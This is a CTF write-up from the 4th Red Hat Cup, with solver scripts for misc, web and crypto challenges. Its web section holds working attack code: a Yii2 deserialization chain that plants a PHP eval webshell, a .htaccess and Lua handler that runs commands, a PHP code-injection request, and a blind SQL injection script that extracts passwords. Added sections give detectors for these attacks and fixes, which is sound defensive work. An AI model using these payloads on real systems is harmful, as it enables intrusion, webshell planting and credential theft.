The 4th Red Hat Cup Cybersecurity Competition
2022-08-10 20:30:00 【MssnHarvey】
Misc
Sign-in
Attachment (extraction code: zlxu)
Decoding the data as EBCDIC yields the flag.
colorful code
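Attachment (extraction code: h3w8)
Group the bytes of data2 in threes to form RGB values; each number in data1 is the position of the corresponding RGB value. Factor the number of entries in data1 into primes to get the image width and height, then draw the image and solve it with npiet (a Piet interpreter).
Script: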
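from PIL import Image
import matplotlib.pyplot as plt

# data1: space-separated indices, one per pixel
f1 = open('data1')
c1 = f1.read()
c1 = c1.split(' ')
print(c1)
print(len(c1))

# data2: raw bytes, every three bytes form one (R, G, B) entry
f = open('data2','rb')
c = f.read()
res = []
for i in range(len(c)//3):
    yyy = c[i*3:i*3+3]
    r,g,b = yyy[0],yyy[1],yyy[2]
    res.append((r,g,b))
print(len(res))
print(res)

# Map each index to its colour (the final split element is dropped)
rr = []
for i in c1[:-1]:
    rr.append(res[int(i)])
print(rr)

# Height and width, from factoring the number of entries
a = 191
b = 37
img = Image.new('RGB',(b,a),(255,255,255))
# Pixels are stored column by column
for j in range(b):
    for i in range(a):
        img.putpixel((j,i),rr[i+j*a])
plt.imshow(img)
img.save('flag.png')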
Web
find_it
Send a GET request (//?code=<?=phpinfo();?>), then visit hack.php to get the flag.
framework
Deserialization
<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            // run() passes $id to the callable stored in $checkAccess
            $this->checkAccess = 'assert';
            $this->id = 'file_put_contents("php://filter/write=convert.base64-decode/resource=/var/www/html/web/assets/5118a5d1/fonts/b.php","PD9waHAgZXZhbCgkX0dFVFthXSk7Pz4K")';
            $this->modelClass='DynamicModel';
            $this->scenario='111';
        }
    }
}
namespace Faker{
    use yii\rest\CreateAction;
    class Generator{
        protected $formatters;
        public function __construct(){
            // A call to close() on this object is routed to CreateAction::run()
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}
namespace yii\db{
    use Faker\Generator;
    class BatchQueryResult{
        private $_dataReader;
        public function __construct(){
            // The destructor calls close() on $_dataReader
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>
#http://eci-2zeab1jn4vnk38xn572o.cloudeci1.ichunqiu.com/index.php?r=site%2Fabout&message=<base64 output of the script above>
Next, construct the payload:
http://eci-2zeab1jn4vnk38xn572o.cloudeci1.ichunqiu.com/assets/5118a5d1/fonts/harvey.php?a=eval($_POST[harvey]);
AntSword then connects successfully, and we find that ua can be used to bypass the protection and execute commands (see 西湖论剑_web1.docx).
So we upload two files, .htaccess and 3.lua:
.htaccess:
AddHandler lua-script .lua
3.lua:
require "string"
--[[
This is the default method name for Lua handlers, see the optional
function-name in the LuaMapHandler directive to choose a different
entry point.
--]]
function handle(r)
    r.content_type = "text/plain"
    r:puts("Hello Lua World!\n")
    local t = io.popen('/readflag')
    local a = t:read("*all")
    r:puts(a)
    if r.method == 'GET' then
        for k, v in pairs( r:parseargs() ) do
            r:puts( string.format("%s: %s\n", k, v) )
        end
    else
        r:puts("Unsupported HTTP method " .. r.method)
    end
end
Finally, request 3.lua to get the flag.
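The message parameter in the deserialization step above carries base64-encoded serialize() output. The following is an added example, not part of the original writeup: it checks request parameters for PHP serialized objects, raw or base64-encoded, and marks the class names used by the chain on this page. The host app.example and the sample object are constructed.

```python
import base64
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Start of a PHP serialized object: O:<name length>:"<class name>":<property count>:{
PHP_OBJECT = re.compile(rb'O:(\d+):"([^"]+)":\d+:\{')

# Class names used by the gadget chain shown on this page.
WATCHED = {"yii\\db\\BatchQueryResult", "Faker\\Generator", "yii\\rest\\CreateAction"}


def serialized_classes(value):
    """Return PHP class names serialized in value, raw or base64-encoded."""
    blobs = [value.encode("utf-8", "replace")]
    try:
        # A literal '+' in a query string arrives as a space; undo that first.
        b64 = value.replace(" ", "+")
        blobs.append(base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True))
    except ValueError:  # binascii.Error is a ValueError subclass
        pass
    names = []
    for blob in blobs:
        for length, name in PHP_OBJECT.findall(blob):
            if int(length) == len(name):  # declared length must match the name
                names.append(name.decode("utf-8", "replace"))
    return names


def inspect_url(url):
    """Map each query parameter that carries serialized objects to its findings."""
    findings = {}
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        classes = serialized_classes(value)
        if classes:
            known = any(c in WATCHED for c in classes)
            findings[key] = {"classes": classes, "known_gadget": known}
    return findings


# Constructed sample: an inert object skeleton with no payload properties.
SAMPLE_BLOB = (b'O:23:"yii\\db\\BatchQueryResult":1:{s:36:"\x00yii\\db\\BatchQueryResult'
               b'\x00_dataReader";O:15:"Faker\\Generator":0:{}}')
SAMPLE_URL = ("http://app.example/index.php?r=site%2Fabout&message="
              + quote(base64.b64encode(SAMPLE_BLOB).decode(), safe=""))

if __name__ == "__main__":
    print(inspect_url(SAMPLE_URL))
```

On the application side, request data should not reach unserialize(); where it must, passing ['allowed_classes' => false] keeps PHP from instantiating any class.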
WebsiteManger
Blind SQL injection
import requests

url='http://eci-2zeg1tmyhxfbqrmxi9m1.cloudeci1.ichunqiu.com/image.php?id=3'
# Boolean test on one character of the password column
payload='^((ascii(substr((select(group_concat(password))from(users)),{},1)))={})'
s='1234567890abcdef'
for i in range(1,30):
    for b in s:
        payloads=payload.format(i,ord(b))
        a=requests.get(url+payloads)
        #print(url+payloads)
        # A shorter response marks a matching character
        if len(a.text)<19000:
            print(b)
            break
        else:
            pass
Running the script yields the password dd6005ef9c77d5ae820ba, which lets us log in.
Then use the SSRF with file:///flag to get the flag.
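The extraction script above replays one query shape against image.php with only the numbers changing, and reads the answer from the response length. The following is an added example, not from the original writeup, that finds this pattern in web-server access logs; the log lines, client addresses and response sizes are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_plus

# Common/combined access-log prefix: client, request line, status, response size.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) (\d+)')
# SQL functions typical of character-by-character extraction, as in the script above.
SQL_TOKENS = re.compile(r"\b(?:ascii|ord|substr|substring|mid)\s*\(", re.I)


def find_blind_sqli(lines, min_variants=5):
    """Report clients that replay one query template with many different numbers."""
    groups = defaultdict(list)
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, _status, size = m.groups()
        decoded = unquote_plus(target)
        if not SQL_TOKENS.search(decoded):
            continue
        template = re.sub(r"\d+", "N", decoded)  # same probe, numbers masked
        numbers = tuple(re.findall(r"\d+", decoded))
        groups[(client, template)].append((numbers, int(size)))
    alerts = []
    for (client, template), hits in groups.items():
        if len({nums for nums, _ in hits}) >= min_variants:
            # Two clusters of response sizes suggest a true/false oracle.
            alerts.append({"client": client, "template": template, "requests": len(hits),
                           "response_sizes": sorted({size for _, size in hits})})
    return alerts


def sample_log():
    """Constructed access-log lines (documentation IP ranges, made-up sizes)."""
    probe = "3^((ascii(substr((select(group_concat(password))from(users)),{},1)))={})"
    lines = ['198.51.100.7 - - [10/Aug/2022:20:30:00 +0000] "GET /image.php?id=3 HTTP/1.1" 200 21400']
    for pos, code, size in [(1, 49, 21400), (1, 50, 21400), (1, 100, 18200),
                            (2, 49, 21400), (2, 100, 18200), (3, 54, 18200)]:
        query = quote(probe.format(pos, code), safe="")
        lines.append(f'203.0.113.9 - - [10/Aug/2022:20:31:00 +0000] '
                     f'"GET /image.php?id={query} HTTP/1.1" 200 {size}')
    return lines


if __name__ == "__main__":
    for alert in find_blind_sqli(sample_log()):
        print(alert)
```

The underlying fix is to bind id as a query parameter (or cast it to an integer) so that it cannot alter the SQL statement.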
Crypto (reused challenges)
primegame
Attachment (extraction code: rlgc)
Based on the writeup for Baby Bubmi: http://www.secmem.org/blog/2020/09/20/poka-science-war-hacking/
Script:
# Run with SageMath (Matrix, ZZ and LLL are Sage built-ins)
import math
from decimal import *
import random
import struct

getcontext().prec = int(100)

# Primes below 100, by trial division
primes = [2]
for i in range(3, 100):
    f = True
    for j in primes:
        if j * j > i:
            break
        if i % j == 0:
            f = False
            break
    if f:
        primes.append(i)

# Weights: ln(p) for each prime, scaled to integers by 16**64
keys = []
for i in range(len(primes)):
    keys.append(Decimal(int(primes[i])).ln())
arr = []
for v in keys:
    arr.append(int(v * int(16) ** int(64)))

ct = 597952043660446249020184773232983974017780255881942379044454676980646417087515453

def encrypt(res):
    h = Decimal(int(0))
    for i in range(len(keys)):
        h += res[i] * keys[i]
    ct = int(h * int(16)**int(64))
    return ct

def f(N):
    # Knapsack lattice scaled down by N; the last row offsets every
    # coefficient by 64, so candidate rows have entries in [-64, 64)
    ln = len(arr)
    A = Matrix(ZZ, ln + 1, ln + 1)
    for i in range(ln):
        A[i, i] = 1
        A[i, ln] = arr[i] // N
        A[ln, i] = 64
    A[ln, ln] = ct // N
    res = A.LLL()
    for i in range(ln + 1):
        flag = True
        for j in range(ln):
            if -64 <= res[i][j] < 64:
                continue
            flag = False
            break
        if flag:
            vec = [int(v + 64) for v in res[i][:-1]]
            # Re-encrypt the candidate to confirm it against ct
            ret = encrypt(vec)
            if ret == ct:
                print(N, bytes(vec))
            else:
                print("NO", ret, bytes(vec))

# Try each scaling factor N
for i in range(2, 10000):
    print(i)
    f(i)
hpcurve
Attachment (extraction code: 97js)
Based on the official writeup for hyper from hxp CTF 2020: https://jsur.in/posts/2020-12-21-hxp-ctf-2020-hyper-writeup
Script:
import itertools
import struct
p = 10000000000000001119
R.<x> = GF(p)[]; y=x
f = y + prod(map(eval, 'yyyyyyy'))
C = HyperellipticCurve(f, 0)
J = C.jacobian()
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]
enc = bytes.fromhex('66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5')
known_pt = b"a"*20 + b"flag"
rng_output = bytes(e^^m for e,m in zip(enc, known_pt))
blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]
L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]
RR.<zz> = PolynomialRing(L)
v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
vi = [(int(-c), int(c)) for c in vi]
for rs in itertools.product(*vi):
    q = struct.pack('<'+'Q'*len(rs), *rs)
    flag = bytes(k^^m for k,m in zip(2*(rng_output+q), enc))
    print(flag)